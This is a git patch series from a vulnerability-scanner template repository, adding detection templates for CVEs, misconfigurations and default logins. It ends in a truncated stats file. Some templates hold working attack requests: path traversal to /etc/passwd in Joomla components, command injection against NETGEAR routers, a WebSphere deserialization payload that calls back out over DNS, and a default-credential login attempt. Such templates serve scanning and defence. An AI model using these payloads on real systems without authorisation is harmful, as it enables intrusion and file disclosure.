type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 97d80d6c05..aef6738399 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -2,10 +2,10 @@ id: http-missing-security-headers info: name: HTTP Missing Security Headers - author: socketz + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration,generic + tags: misconfig,generic requests: - method: GET From 735b1df1c56648acb0968bf9ef751e8bd68b3f17 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 12:09:59 -0500 Subject: [PATCH 030/339] Update php-errors.yaml --- misconfiguration/php-errors.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 11e7defb9f..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -18,6 +18,7 @@ requests: - '(?i)Call to undefined method' - '(?i)You have an error in your SQL syntax' - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' @@ -35,3 +36,5 @@ requests: - '(?i)expects parameter [0-9]*' - '(?i)Debug Trace' - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' From c61276d34e70fff0663c8ed8f2f9b3666a6aa8e8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 4 Sep 2021 10:35:49 +0700 Subject: [PATCH 031/339] Create CVE-2010-1476.yaml --- cves/2010/CVE-2010-1476.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1476.yaml diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml new file mode 100644 index 0000000000..c1718acac9 --- /dev/null +++ b/cves/2010/CVE-2010-1476.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1476 + +info: + name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12150 + - https://www.cvedetails.com/cve/CVE-2010-1476 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 4c0e1b9fea4844601c6f7bff4175802ebc841b3b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 4 Sep 2021 11:00:25 +0700 Subject: [PATCH 032/339] Create CVE-2010-1307.yaml --- cves/2010/CVE-2010-1307.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1307.yaml diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml new file mode 100644 index 0000000000..70c1ac485f --- /dev/null +++ b/cves/2010/CVE-2010-1307.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1307 + +info: + name: Joomla! Component Magic Updater - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12070 + - https://www.cvedetails.com/cve/CVE-2010-1307 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f1e770fc06be144b7d1d291bc003df15ab5eee65 Mon Sep 17 00:00:00 2001 From: idealphase Date: Sat, 4 Sep 2021 14:00:28 +0700 Subject: [PATCH 033/339] Added CVE-2019-18818 Added CVE-2019-18818 --- cves/2019/CVE-2019-18818.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2019/CVE-2019-18818.yaml diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml new file mode 100644 index 0000000000..b4c3f64440 --- /dev/null +++ b/cves/2019/CVE-2019-18818.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/strapiVersion" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "strapiVersion" + part: body + + - type: word + words: + - '3.0.0-beta.17.4' + part: bod From 226d48db4c443e82cd0189b0ab9a51380f401b9c Mon Sep 17 00:00:00 2001 From: idealphase Date: Sat, 4 Sep 2021 14:07:24 +0700 Subject: [PATCH 034/339] Update CVE-2019-18818.yaml Added matchers header --- cves/2019/CVE-2019-18818.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index b4c3f64440..7ceb685ff8 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -20,6 +20,11 @@ requests: - type: status status: - 200 + + - type: word + words: + - "application/json" + part: header - type: word words: @@ -29,4 +34,4 @@ requests: - type: word words: - '3.0.0-beta.17.4' - part: bod + part: body From b7a05877682ac3240b8f85077253082c93a1f280 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 13:59:56 +0530 Subject: [PATCH 035/339] Update CVE-2019-18818.yaml --- cves/2019/CVE-2019-18818.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 7ceb685ff8..01fceb5e82 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -20,7 +20,7 @@ requests: - type: status status: - 200 - + - type: word words: - "application/json" From a30ee89de4e745b233138b11894102b4183d949c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 14:38:33 +0530 Subject: [PATCH 036/339] temporary removal This template requires support that will be part of next version of nuclei, as such keeping this template in PR till next nuclei release --- cves/2015/CVE-2015-7450.yaml | 51 ------------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 cves/2015/CVE-2015-7450.yaml diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml deleted file mode 100644 index a28bfc6ead..0000000000 --- a/cves/2015/CVE-2015-7450.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization RCE - author: wdahlenb - severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - - - - - - - rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== - getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} - rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= - - - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" From 29b772a14b96a21e19d8eb2ecaf40304cdd0252c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 4 Sep 2021 16:45:28 +0700 Subject: [PATCH 037/339] Create CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2016/CVE-2016-6277.yaml diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml new file mode 100644 index 0000000000..6f61ebef3c --- /dev/null +++ b/cves/2016/CVE-2016-6277.yaml @@ -0,0 +1,27 @@ +id: CVE-2016-6277 + +info: + name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE + author: pikpikcu + severity: critical + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cves2016,netgear,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b74dffae920b64923bb55b726593d9f99e858957 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:23:49 +0530 Subject: [PATCH 038/339] misc update --- ...exposed-metrics.yaml => kubernetes-metrics.yaml} | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) rename misconfiguration/{kubernetes-exposed-metrics.yaml => kubernetes-metrics.yaml} (62%) diff --git a/misconfiguration/kubernetes-exposed-metrics.yaml b/misconfiguration/kubernetes-metrics.yaml similarity index 62% rename from misconfiguration/kubernetes-exposed-metrics.yaml rename to misconfiguration/kubernetes-metrics.yaml index f33fd429b0..ff9910a0cd 100644 --- a/misconfiguration/kubernetes-exposed-metrics.yaml +++ b/misconfiguration/kubernetes-metrics.yaml @@ -1,24 +1,29 @@ -id: kubernetes-exposed-metrics +id: kubernetes-metrics + info: name: Detect Kubernetes Exposed Metrics author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: kubernetes,exposure, metrics + tags: kubernetes,exposure,devops + reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes + requests: - method: GET path: - - "{{BaseURL}}:8080/metrics" + - "{{BaseURL}}/metrics" + matchers-condition: and matchers: - type: word part: body + condition: and words: - "namespace" - "HELP" - "TYPE" - "kube" - condition: and + - type: status status: - 200 \ No newline at end of file From 82631062a1dee87b42a16043622e3b3ba4189c23 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:24:59 +0530 Subject: [PATCH 039/339] misc update --- cves/2016/CVE-2016-6277.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 6f61ebef3c..15e20f4634 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical - reference: - - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce + tags: cve,cves2016,netgear,rce,iot requests: - method: GET From f4187c14da3724859226d4e7aa8d2f3d4e14b7de Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:28:58 +0530 Subject: [PATCH 040/339] Update CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 15e20f4634..964fdfed40 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce,iot requests: - method: GET From 4a9a339feb6fe0a57c8cb0f5577d71a6bc287e7a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:40:34 +0530 Subject: [PATCH 041/339] misc update --- misconfiguration/node-exporter-metrics.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/misconfiguration/node-exporter-metrics.yaml b/misconfiguration/node-exporter-metrics.yaml index 5320578547..b5242c50c6 100644 --- a/misconfiguration/node-exporter-metrics.yaml +++ b/misconfiguration/node-exporter-metrics.yaml @@ -1,27 +1,26 @@ id: node-exporter-metrics + info: name: Detect Node Exporter Metrics author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure, metrics + tags: node,exposure,debug + requests: - method: GET path: - - "{{BaseURL}}:9100/metrics" + - "{{BaseURL}}/metrics" + matchers-condition: and matchers: - type: word part: body words: - - "go_goroutines" - - "HELP" - - "gauge" - "node_cooling_device" - "node_network" - - "boot" - - "TYPE go_goroutines gauge" condition: and + - type: status status: - 200 \ No newline at end of file From 969e08f12e2b6be23cab5db9c2ddd1ef7f77c6ba Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:54:24 +0530 Subject: [PATCH 042/339] moving files around --- .../{ => kubernetes}/kubernetes-metrics.yaml | 0 .../{ => kubernetes}/kubernetes-pods.yaml | 4 +++- .../kubernetes-resource-report.yaml} | 14 +++++++------- technologies/abyss-web-server.yaml | 12 ++++++++---- technologies/kubernetes-enterprise-manager.yaml | 12 ++++++++---- ...netes-engine.yaml => kubernetes-mirantis.yaml} | 14 +++++++++----- technologies/oracle-iplanet-web-server.yaml | 15 +++++++++------ 7 files changed, 44 insertions(+), 27 deletions(-) rename misconfiguration/{ => kubernetes}/kubernetes-metrics.yaml (100%) rename misconfiguration/{ => kubernetes}/kubernetes-pods.yaml (97%) rename misconfiguration/{overview-kubernetes-resource-report.yaml => kubernetes/kubernetes-resource-report.yaml} (59%) rename technologies/{mirantis-kubernetes-engine.yaml => kubernetes-mirantis.yaml} (56%) diff --git a/misconfiguration/kubernetes-metrics.yaml b/misconfiguration/kubernetes/kubernetes-metrics.yaml similarity index 100% rename from misconfiguration/kubernetes-metrics.yaml rename to misconfiguration/kubernetes/kubernetes-metrics.yaml diff --git a/misconfiguration/kubernetes-pods.yaml b/misconfiguration/kubernetes/kubernetes-pods.yaml similarity index 97% rename from misconfiguration/kubernetes-pods.yaml rename to misconfiguration/kubernetes/kubernetes-pods.yaml index 97e6143374..2ac2d71c59 100644 --- a/misconfiguration/kubernetes-pods.yaml +++ b/misconfiguration/kubernetes/kubernetes-pods.yaml @@ -13,16 +13,18 @@ requests: path: - '{{BaseURL}}/pods' - '{{BaseURL}}/api/v1/pods' + matchers-condition: and matchers: - type: word words: - "apiVersion" - part: body + - type: word words: - "application/json" part: header + - type: status status: - 200 diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/kubernetes/kubernetes-resource-report.yaml similarity index 59% rename from misconfiguration/overview-kubernetes-resource-report.yaml rename to misconfiguration/kubernetes/kubernetes-resource-report.yaml index 34d9dca54d..64c518fa31 100644 --- a/misconfiguration/overview-kubernetes-resource-report.yaml +++ b/misconfiguration/kubernetes/kubernetes-resource-report.yaml @@ -1,24 +1,24 @@ -id: overview-kubernetes-resource-report +id: kubernetes-resource-report + info: name: Detect Overview Kubernetes Resource Report author: pussycat0x severity: medium description: Information Disclosure of Kubernetes Resource Report - tags: Kubernetes,exposure + tags: kubernetes,exposure + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Overview - Kubernetes Resource Report" - - "Pods" - - "Worker Nodes" - - "Applications" - condition: and + - "Overview - Kubernetes Resource Report" + - type: status status: - 200 diff --git a/technologies/abyss-web-server.yaml b/technologies/abyss-web-server.yaml index 2e65c1eef3..a760447d4b 100644 --- a/technologies/abyss-web-server.yaml +++ b/technologies/abyss-web-server.yaml @@ -1,21 +1,25 @@ -id: abyss-web-server-detect +id: abyss-web-server + info: name: Detect Abyss Web Server author: pussycat0x severity: info tags: tech - reference: app="Abyss-Web-Server" -fofa query + additional-fields: + fofa-dork: 'app="Abyss-Web-Server"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Welcome to Abyss Web Server" - condition: and + - "Welcome to Abyss Web Server" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes-enterprise-manager.yaml index ed6241c0f9..3a22e2d120 100644 --- a/technologies/kubernetes-enterprise-manager.yaml +++ b/technologies/kubernetes-enterprise-manager.yaml @@ -1,21 +1,25 @@ id: kubernetes-enterprise-manager + info: name: Detect Kubernetes Enterprise Manager author: pussycat0x severity: info - tags: tech - reference: app="Kubernetes-Enterprise-Manager" -fofa query + tags: tech,kubernetes + additional-fields: + fofa-dork: 'app="Kubernetes-Enterprise-Manager"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Kubernetes Enterprise Manager" - condition: and + - "Kubernetes Enterprise Manager" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/mirantis-kubernetes-engine.yaml b/technologies/kubernetes-mirantis.yaml similarity index 56% rename from technologies/mirantis-kubernetes-engine.yaml rename to technologies/kubernetes-mirantis.yaml index 9988ad9a0f..34516924bc 100644 --- a/technologies/mirantis-kubernetes-engine.yaml +++ b/technologies/kubernetes-mirantis.yaml @@ -1,21 +1,25 @@ -id: mirantis-kubernetes-engine +id: kubernetes-mirantis + info: name: Detect Mirantis Kubernetes Engine author: pussycat0x severity: info - tags: tech - reference: app="Mirantis-Kubernetes-Engine" -fofa query + tags: tech,kubernetes + additional-fields: + fofa-dork: 'app="Mirantis-Kubernetes-Engine"' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Mirantis Kubernetes Engine" - condition: and + - "Mirantis Kubernetes Engine" + - type: status status: - 200 \ No newline at end of file diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle-iplanet-web-server.yaml index abdc9fc14e..12d06c6232 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle-iplanet-web-server.yaml @@ -1,22 +1,25 @@ -id: oracle-iplanet-web-server-detect +id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - tags: tech - reference: app="Oracle-iPlanet-Web-Server -fofa query + tags: tech,oracle + additional-fields: + fofa-dork: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - - "Oracle iPlanet Web Server 7.0" - - "Oracle iPlanet Web Server" - condition: and + - "Oracle iPlanet Web Server" + - type: status status: - 200 \ No newline at end of file From ae801e87eb8eb881d1c5bbb3fb5132f96209f561 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 16:38:32 +0530 Subject: [PATCH 043/339] minor update --- ...in.yaml => vidyo-default-credentials.yaml} | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) rename default-logins/vidyo/{vidyo-super-admin.yaml => vidyo-default-credentials.yaml} (76%) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-default-credentials.yaml similarity index 76% rename from default-logins/vidyo/vidyo-super-admin.yaml rename to default-logins/vidyo/vidyo-default-credentials.yaml index 0749aa4548..1c27bad550 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-default-credentials.yaml @@ -5,6 +5,7 @@ info: author: izn0u severity: medium description: test for default cred super:password + reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 tags: vidyo,default-login @@ -20,19 +21,11 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} - Referer: http://{{Hostname}}/super/login.html?lang=en + Referer: {{RootURL}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en username=super&password=password - - | - GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/super/login.html?lang=en - - cookie-reuse: true - redirects: true - extractors: - type: regex name: csrf_tkn @@ -49,7 +42,13 @@ requests: kval: - JSESSIONID + matchers-condition: and matchers: - type: word + part: header words: - - "Vidyo MainSuperAdmin" + - "/super/index.html" + + - type: status + status: + - 302 \ No newline at end of file From 23f69a2a21af1a955bd9f396c7696ca073b26caa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 4 Sep 2021 11:18:38 +0000 Subject: [PATCH 044/339] Auto Generated Templates Stats [Sat Sep 4 11:18:38 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1463 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 747 insertions(+), 738 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 1aab383f1d..01a0ac282d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":649},{"name":"panel","count":236},{"name":"xss","count":224},{"name":"lfi","count":221},{"name":"exposure","count":217},{"name":"wordpress","count":205},{"name":"rce","count":190},{"name":"cve2020","count":157},{"name":"wp-plugin","count":138},{"name":"tech","count":106},{"name":"cve2021","count":106},{"name":"config","count":93},{"name":"cve2019","count":91},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":58},{"name":"iot","count":56},{"name":"joomla","count":52},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"cve2010","count":44},{"name":"network","count":39},{"name":"sqli","count":37},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"misc","count":27},{"name":"atlassian","count":27},{"name":"redirect","count":26},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"router","count":19},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"cve2015","count":19},{"name":"sap","count":18},{"name":"disclosure","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"php","count":12},{"name":"adobe","count":12},{"name":"dlink","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"jetty","count":6},{"name":"files","count":6},{"name":"google","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"confluence","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"microsoft","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"wp-theme","count":5},{"name":"java","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"wso2","count":4},{"name":"nodejs","count":4},{"name":"tomcat","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"hp","count":4},{"name":"traversal","count":4},{"name":"zimbra","count":4},{"name":"vpn","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"firmware","count":4},{"name":"thinkphp","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"deserialization","count":4},{"name":"samsung","count":4},{"name":"glpi","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"fanruan","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"kevinlab","count":3},{"name":"slack","count":3},{"name":"intrusive","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"microstrategy","count":3},{"name":"ssh","count":3},{"name":"zabbix","count":3},{"name":"zhiyuan","count":3},{"name":"ofbiz","count":3},{"name":"resin","count":3},{"name":"log","count":3},{"name":"tikiwiki","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"jellyfin","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"showdoc","count":2},{"name":"voipmoni